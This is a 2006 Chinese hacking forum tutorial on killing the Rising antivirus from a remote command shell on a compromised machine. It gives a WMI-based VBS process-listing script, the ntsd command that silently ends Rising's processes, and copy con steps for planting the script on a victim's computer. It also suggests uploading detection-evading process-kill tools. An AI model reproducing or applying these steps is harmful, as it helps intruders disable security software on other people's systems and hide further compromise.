如何在CMDShell下干掉瑞星？

　　很多人都说在shell下关不掉瑞星，停止不了他的服务，因为停的时候会弹出确认的提示。其实很简单，我们可以在没有任何工具辅助的情况下关掉他，并且没有任何提示。
我们的思路就是用脚本列出当前系统教程的PID，然后用系统自带的ntsd.exe来结束这个进程。下面看操作！
这个就是脚本的内容(保存为.vbs就可以了)：

wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next

　　前提是我们得想办法把这个脚本写到目标主机上。方法很多，这里就不说了，进入正题。
我们先用正常的方法停止试试，会弹出提示，这个时候我们的CMDshell就会死掉，所以我们用结束进程的方法。
输入命令的时候一定要是 cscript pid.vbs 如果只输入pid.vbs就会是这样，看到了吧？
7304 CCenter.exe
8088 RavMonD.exe
4676 RavStub.exe
6992 RavMon.exe
这些就是瑞星的进程了，我们用ntsd.exe来结束他，(ntsd.exe是系统自带的)
命令:
ntsd -c q -p 什么都没有了。
就是这么简单！当然，如果有条件上传一个免杀的pslist.exe和pskill.exe或者mt.exe就可以不用这么麻烦了。教程就到这里，没什么技术含量，大家不要见笑。

如何将这个VBS种植于别人的电脑上呢？

1、我们在他的C盘写一个bat文件：
copy con 1.bat
写入

wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next

然后
rename 1.bat 1.vbs
这样就在他的C盘种上了这个VBS脚本。

2、直接写入VBS脚本也写可以
copy con 1.vbs
写入

wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next

最后说一下，XP及XP以上系统自带了一个tasklist和taskkill可以分别用来列出进程和杀死进程。
（野球小子 于 2006-11-05 12:13 AM）

• CMDShell下文件上传又一意想不到的方法 – IE缓存的利用
• CMDShell下文件上传的另一绝佳方法分析与应用